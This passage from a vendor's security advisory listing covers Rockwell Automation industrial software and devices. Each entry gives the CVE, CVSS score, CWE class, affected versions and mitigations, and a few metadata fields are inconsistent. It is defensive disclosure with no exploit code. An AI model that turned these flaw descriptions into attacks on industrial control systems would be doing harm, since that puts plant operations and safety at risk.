A memory corruption security issue could allow a threat actor to insert unauthorized code to the software. This is done by corrupting the memory triggering an access violation. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21918 IMPACT

A memory buffer security issue could allow a threat actor to insert unauthorized code to the software. This is done by corrupting the memory and triggering an access violation. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21919 IMPACT

An arbitrary code execution vulnerability exists in the affected product. A threat actor could leverage an uninitialized pointer that is passed throughout the application to insert unauthorized code into the software, resulting in undefined behavior. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To exploit this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21920 IMPACT

A memory buffer security issue could allow a threat actor to read beyond the intended memory boundaries. This could reveal sensitive information and cause the application to crash, resulting in a denial-of-service condition. To exploit this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 4.4
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

 

Mitigations and Workarounds

Customers using the affected software should use the risk mitigations and security best practices.

  • Do not open untrusted files from unknown sources.
  • Customers should also follow our suggested security best practices for industrial automation control systems to minimize the risks.

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

ADDITIONAL RESOURCES

  • CVE-2024-21912 JSON
  • CVE-2024-21913 JSON
  • CVE-2024-2929 JSON
  • CVE-2024-21918 JSON
  • CVE-2024-21919 JSON
  • CVE-2024-21920 JSON

Glossary

Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

Denial-of-Service: an attack that makes a system or device unavailable to its legitimate users, for example by overwhelming it with traffic or by triggering a crash

Heap-based Memory Buffer Overflow: a type of buffer overflow that occurs in the heap data area. Memory on the heap is dynamically allocated at runtime and typically contains program data.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Memory Buffer Overflow: occurs when a program writes more data to a buffer than it can hold. This can lead to data corruption, program crashes, or unintended behavior

Memory Corruption: occurs when a flaw in software leads to the modification of memory in unintended ways, potentially causing unexpected behavior or providing avenues for exploitation

Uninitialized Pointer: occurs when a program accesses or uses a pointer that has not been initialized. If the pointer contains an uninitialized value, it might not point to a valid memory location, leading to unpredictable behavior and potential security vulnerabilities

High
SD1664 | Denial-of-service and Input Validation Vulnerabilities in PowerFlex® 527
Published Date:
March 21, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-2425, CVE-2024-2426, CVE-2024-2427
Products:
PowerFlex® 527
CVSS Scores:
7.5, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Published Date: March 21, 2024
Last updated: August 5, 2025
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
PowerFlex® 527 | v2.001.x and later | n/a (no corrected version available)

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following security issues.

CVE-2024-2425 IMPACT

A denial-of-service security issue exists in the PowerFlex® 527 due to improper input validation in the device. Malicious input causes the web server to crash, and a manual restart is required to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0:  8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Improper Input Validation (the advisory lists CWE-120)

Known Exploited Vulnerability (KEV) database:  No

CVE-2024-2426 IMPACT

A denial-of-service security issue exists in the PowerFlex® 527 due to improper input validation in the device. A disruption in the CIP communication could occur and a manual restart will be required by the user to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0:  8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Improper Input Validation (the advisory lists CWE-120)

Known Exploited Vulnerability (KEV) database:  No

CVE-2024-2427 IMPACT

A denial-of-service security issue exists in the PowerFlex® 527. This is due to improper traffic throttling in the device. If multiple data packets are sent to the device repeatedly the device will crash and require a manual restart to recover.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-400: Uncontrolled Resource Consumption

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

There is currently no fix for this issue. Customers using the affected software should use the following risk mitigations and security best practices.

  • Implement network segmentation, confirming the device is on an isolated network.
  • Disable the web server if it is not needed. The web server is disabled by default; the option to disable it is available in v2.001.x and later.
  • Security Best Practices

 ADDITIONAL RESOURCES

  • JSON CVE-2024-2425
  • JSON CVE-2024-2426
  • JSON CVE-2024-2427

Glossary

CIP Communication: Common Industrial Protocol (CIP) is a common communication standard that is widely used in industrial automation. Comprises a series of protocols for communication between different devices and systems in automation technology

Denial-of-Service: an attack that makes a system or device unavailable to its legitimate users, for example by overwhelming it with traffic or by triggering a crash

Traffic Throttling: limiting the rate at which a device accepts incoming traffic so that a flood of packets cannot exhaust its resources

Medium
SD1663 | FactoryTalk® View ME on PanelView™ Plus 7 Boot Terminal Lacks Security Protections
Published Date:
March 21, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2024-21914
Products:
FactoryTalk® View ME
CVSS Scores (v3.1):
5.3
CVSS Scores (v4.0):
6.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: March 21, 2024
Last updated: August 5, 2025
Revision Number: 1.0
CVSS Score: v3.1: 5.3/10, v4.0: 6.9/10

The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency with customers in all business environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® View ME | < v14 | v11, v12, v13, v14

SECURITY ISSUE DETAILS

Rockwell Automation used CVSS v3.1 and v4.0 scoring system to assess the following security issues.

CVE-2024-21914 IMPACT

A security issue exists in the affected product. This allows a threat actor to restart the PanelView™ Plus 7 terminal remotely without security protections. This could lead to the loss of view or control of the PanelView™ product.

CVSS 3.1 Base Score: 5.3

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS 4.0 Base Score: 6.9

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE: Improper security protection for remote restart action

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

Customers using the affected software that are unable to upgrade to the corrected versions should use security best practices.

Security Best Practices

 ADDITIONAL RESOURCES

  • JSON CVE 2024-21914

Glossary

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Critical
SD1662 | FactoryTalk® Service Platform Elevated Privileges Vulnerability Through Web Service Functionality
Published Date:
February 14, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-21915
Products:
FactoryTalk® Service Platform
CVSS Scores (v3.1):
9.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: February 15, 2024
Last updated:  August 5, 2025 
Revision Number: 1.0
CVSS Score: 9.0/10

The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency with customers in all business environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® Service Platform | < v2.74 | Update to v2.74 or later


SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following security issues.

CVE-2024-21915 IMPACT

A privilege escalation security issue exists in FactoryTalk® Service Platform (FTSP). A threat actor with basic user group privileges could sign into the software and receive FTSP Administrator Group privileges. A threat actor could then read and modify sensitive data, delete data and render the FTSP system unavailable.

CVSS Base Score: 9.0
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE: CWE-279: Incorrect Execution-Assigned Permissions

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

Customers using the affected software that cannot upgrade to the corrected versions should use mitigations and security best practices:

  • Security Best Practices

ADDITIONAL RESOURCES

  • Patch: Incorrect user groups returned from FactoryTalk® Web Service, FactoryTalk® Services Platform 2.74
  • JSON CVE-2024-21915

Glossary

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Privilege escalation: cyberattack technique where an attacker gains unauthorized access to higher-level privileges within a system, allowing them to perform actions that are typically restricted.

High
SD1661 | Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers
Published Date:
January 30, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024-21916
Products:
ControlLogix® 5570, GuardLogix® 5570, ControlLogix® 5570 Redundancy
CVSS Scores (v3.1):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers

Published Date: January 30, 2024

Last updated: 1.0

Revision Number: 1.0

CVSS Score: 8.6

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Firmware Corrected in Firmware
ControlLogix® 5570 20.011 v33.016, 34.013, 35.012, 36.011 and later
GuardLogix® 5570 20.011 v33.016, 34.013, 35.012, 36.011 and later
ControlLogix® 5570 Redundancy 20.054_kit1 v33.053_kit1, 34.052_kit1, 35.052_kit1, 36.051_kit1 and later

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-21916 IMPACT

A denial-of-service vulnerability exists in the affected products listed above. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF.

CVSS Base Score: 8.6

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-21916
Critical
SD1660 | FactoryTalk® Service Platform Service Token Vulnerability
Published Date:
January 30, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-21917
Products:
FactoryTalk® Service Platform
CVSS Scores (v3.1):
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: January 30, 2024

Revision History

Version 1.0 - March 5, 2024 - Updated Mitigations and Workarounds

Version 1.1 - July 18, 2025 - Updated for readability

Revision Number: 1.1

CVSS Score: 9.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® Service Platform <= v6.31 v6.40 or later

SECURITY ISSUE DETAILS

Rockwell Automation used the CVSS v3.1 scoring system to assess the following security issues.

CVE-2024-21917 IMPACT

A security issue exists in the affected product that allows a malicious user to obtain the service token and use it for authentication on another FactoryTalk® Service Platform (FTSP) directory. This is due to the lack of digital signing between the FTSP service token and directory. A threat actor could potentially retrieve user information and modify settings without any authentication.

CVSS Base Score: 9.8/10 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-347: Improper Verification of Cryptographic Signature

Known Exploited Vulnerability (KEV) database:  No

Mitigations and Workarounds

Customers using the affected software should use risk mitigations and our suggested security best practices to minimize the risks.

Customers updating to v6.40 or later should do one of the following steps:

  1. Set the FactoryTalk Directory’s System Communications Type security policy to SOCKET.IO. This prevents FactoryTalk Services Platform from using the DCOM communication channel. When set to SOCKET.IO, only v6.40 and later FactoryTalk Directory clients can communicate with the FactoryTalk Directory server.

  2. If the v6.40 (or later) FactoryTalk Directory server must support communication with legacy FactoryTalk Directory client versions (v6.31 and earlier), the System Communication Type setting should not be altered from AUTO or DCOM.
    Instead, elevate the DCOM Authentication Level to PACKET PRIVACY (‘6’). Please refer to Mitigating Microsoft DCOM Hardening Patch (CVE-2021-26414) for Affected Rockwell Automation Products (custhelp.com)

IMPORTANT! Two v6.40 (or later) FactoryTalk Directory security policies can prevent legacy FactoryTalk Directory clients (v6.31 and earlier) from connecting to the FactoryTalk Directory server. Set both security policies to Legacy to allow the connection.
The two security policies are the Service Token signature method and Encryption method.

Customers who are unable to update to v6.40 or later should apply the following:

  • Set DCOM authentication level to 6. This enables encryption of the service token and communication channel between the server and client. Please refer to Mitigating Microsoft DCOM Hardening Patch (CVE-2021-26414) for Affected Rockwell Automation Products (custhelp.com)
  • When it is not possible to update to v6.40 or later, enable verification of the publisher information (i.e., digital signature) of any executable attempting to use the FactoryTalk® Services APIs. This helps prevent a threat actor from calling the API to receive the service token. This setting can be changed from the Application Authorization node located within System Policies using the FactoryTalk® Administration Console application.
  • Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

ADDITIONAL RESOURCES

  • JSON CVE-2024-21917

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High
SD1659 | LP30/40/50 and BM40 Operator Interface Vulnerable to CODESYS Vulnerabilities
Published Date:
January 24, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2022-47378, CVE-2022-47379, CVE-2022-47380, CVE-2022-47381, CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390, CVE-2022-47385, CVE-2022-47392, CVE-2022-47393
Products:
LP30 Operator Panel, LP40 Operator Panel, BM40 Operator Panel, LP50 Operator Panel
CVSS Scores (v3.1):
6.5, 8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: January 25, 2024

Last updated: January 25, 2024

Revision Number: 1.0

CVSS Score: 8.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Software Revision Corrected in Software Revision
LP30 Operator Panel Codesys versions before V3.5.19.0 Codesys 3.5.19.2
LP40 Operator Panel Codesys versions before V3.5.19.0 Codesys 3.5.19.2
BM40 Operator Panel Codesys versions before V3.5.19.0 Codesys 3.5.19.2
LP50 Operator Panel Codesys versions before V3.5.19.0 Codesys 3.5.19.2

VULNERABILITY DETAILS

The CODESYS Control runtime system is utilized in the affected ASEM™ (A Rockwell Automation Company) products and enables embedded or PC-based devices to be programmable industrial controllers. Such products contain communication servers for the CODESYS protocol to enable communication with clients like the CODESYS Development System.

These products have the following vulnerabilities:

 

CVE-2022-47378 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE-1288: Improper Validation of Consistency within Input

 

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpFiletransfer component to read internally from an invalid address, potentially leading to a denial-of-service condition.

 

CVE-2022-47379 IMPACT

CVSS Base Score: 8.8/10 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to memory, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47380, CVE-2022-47381 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

 

CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

After successful authentication, specifically crafted communication requests can cause the CmpTraceMgr component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47385 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpAppForce component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47392 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-1288: Improper Validation of Consistency within Input

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

 

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpApp/CmpAppBP/CmpAppForce components to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2022-47393 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-822: Untrusted Pointer Dereference

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

After successful authentication, specifically crafted communication requests can cause the cmpFiletransfer component to dereference addresses provided by the request for internal read access, which can lead to a denial-of-service situation.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to CODESYS version 3.5.19.2 which has been released to mitigate these issues.
  • Additionally, we encourage the customer to implement our suggested security best practices to minimize risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

CODESYS Advisory

High
SD1658 | SIS Workstation and ISaGRAF Workbench Code Execution and Privilege Escalation
Published Date:
November 15, 2023
Last Updated:
November 15, 2023
CVE IDs:
CVE-2015-9268
Products:
Safety Instrumented System Workstation, ISaGRAF® Workbench
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8/10

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Software Version Corrected in Software Version
Safety Instrumented System Workstation <= v1.2 v2.00 and later
ISaGRAF® Workbench <= v6.6.9 v6.06.10 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2015-9268 IMPACT

Due to the third-party vulnerabilities in Nullsoft Scriptable Install System (NSIS), the SIS Workstation and ISaGRAF® Workbench installer and uninstaller have unsafe implicit linking against Version.dll. Therefore, there is no protection mechanism in the wrapper function that resolves the dependency at an appropriate time during runtime. Also, the SIS workstation and ISaGRAF® Workbench uninstaller uses temporary folder locations that allow unprivileged local users to overwrite files. This allows a local attack in which the uninstaller can be replaced by a malicious program.

CVSS Base Score: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Security Best Practices

ADDITIONAL RESOURCES

  • CVE-2015-9268 JSON
Critical
SD1657 | FactoryTalk® Activation Contains Wibu CodeMeter Vulnerabilities
Published Date:
November 15, 2023
Last Updated:
November 19, 2024
CVE IDs:
CVE-2023-38545, CVE-2023-3935
Products:
FactoryTalk Activation Manager
CVSS Scores (v3.1):
7.9, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk Activation Manager V4.00 (Utilizes Wibu-Systems CodeMeter <7.60c) 5.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-38545 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer use the affected Wibu-Systems products, which internally use libcurl in a version that is vulnerable to a buffer overflow if curl is configured to redirect traffic through a SOCKS5 proxy. A malicious proxy can exploit a bug in the implemented handshake to cause a buffer overflow. If no SOCKS5 proxy has been configured, there is no attack surface.

CVSS Base Score: 7.9

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

CVE-2023-3935 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer use the affected Wibu-Systems products, which contain a heap buffer overflow vulnerability in the Wibu CodeMeter Runtime network service up to version 7.60b that allows an unauthenticated, remote attacker to achieve RCE and gain full access to the host system.

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to FactoryTalk Activation Manager 5.01, which has been patched to mitigate these issues (available versions here, search "activation").
  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

ADDITIONAL RESOURCES

  • CVE-2023-38545 JSON
  • CVE-2023-3935 JSON
  • Wibu Systems Product Security Advisory WIBU-230704-01 (CVE-2023-3935)
  • Wibu Systems Product Security Advisory WIBU-231017-01 (CVE-2023-38545)
High
PN1656 | FactoryTalk® View Site Edition Vulnerable to Improper Input Validation
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-46289
Products:
FactoryTalk® View Site Edition
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision History

Revision Number: 1.0

Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® View Site Edition V11.0 v11.0 & v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46289 IMPACT
The affected product insufficiently validates user input, which could potentially allow threat actors to send malicious data bringing the product offline. If exploited, the product would become unavailable and require a restart to recover resulting in a denial-of-service condition.

CVSS Base Score: 7.5/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Install the patch that remediates the issue: BF29581 - Patch: External Service Interaction (HTTP), FactoryTalk View SE 11.0, 12.0 13.0.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-46289 JSON
High
PN1655 | FactoryTalk® Services Platform Elevated Privileges Vulnerability
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-46290
Products:
FactoryTalk® Services Platform
CVSS Scores (v3.1):
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision History

Revision Number: 1.0

Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® Services Platform v2.74 V2.80 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46290 IMPACT
Due to inadequate code logic, a previously unauthenticated threat actor could potentially obtain a local Windows OS user token through the FactoryTalk® Services Platform web service and then use the token to log in to FactoryTalk® Services Platform. This vulnerability can only be exploited if the authorized user did not previously log in to the FactoryTalk® Services Platform web service.

CVSS Base Score: 8.1/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Install the respective FactoryTalk Services Version that remediates the issue.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-46290 JSON
High
PN1654 | Arena® Simulation Buffer Overflow Vulnerabilities
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-27854, CVE-2023-27858
Products:
Arena® Simulation Software
CVSS Scores (v3.1):
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision History

Revision Number: 1.0

Version 1.0 – October 27, 2023

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
Arena® Simulation Software V16.00 16.20.02

Vulnerability Details

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-27854 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow. The threat actor could then execute malicious code on the system, affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

CVE-2023-27858 IMPACT
An arbitrary code execution vulnerability could potentially allow a malicious user to commit unauthorized code to the software by using an uninitialized pointer in the application. The threat actor could then execute malicious code on the system, affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to 16.20.02, which has been patched to mitigate these issues, by referencing BF29820 - Patch: ZDI Security Patch & Windows 11 updates, Arena 16.2.
  • Implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

  • CVE-2023-27854 JSON
  • CVE-2023-27858 JSON
Critical
PN1653 | Stratix® 5800 and 5200 vulnerable to Cisco IOS XE Web UI Privilege Escalation (Active Exploit)
Published Date:
October 18, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-20198
Products:
Stratix® 5200, Stratix® 5800
CVSS Scores (v3.1):
7.2, 10
Known Exploited Vulnerability (KEV):
Yes
Corrected:
Yes
Workaround:
No

Published Date: 10/17/2023
Last updated:  02/14/2024
Revision Number: 2.0
Revision History: Updated Corrected in firmware revision
CVSS Score: 10/10

Rockwell Automation is aware of an actively exploited zero-day vulnerability affecting the Stratix® 5800 and the newly released Stratix® 5200 product. This vulnerability was reported by Cisco on October 16, 2023 and additional information can be found in their original disclosure. As of the time of publication, no patch is available for this vulnerability and multiple cases of active exploitation have been observed. While Rockwell Automation has no evidence of active exploitation against the Stratix® product line, this vulnerability was discovered by Cisco Talos during an incident response for a Cisco customer. This advisory will be updated as remediation steps become available.

REVISION 1.1 UPDATE

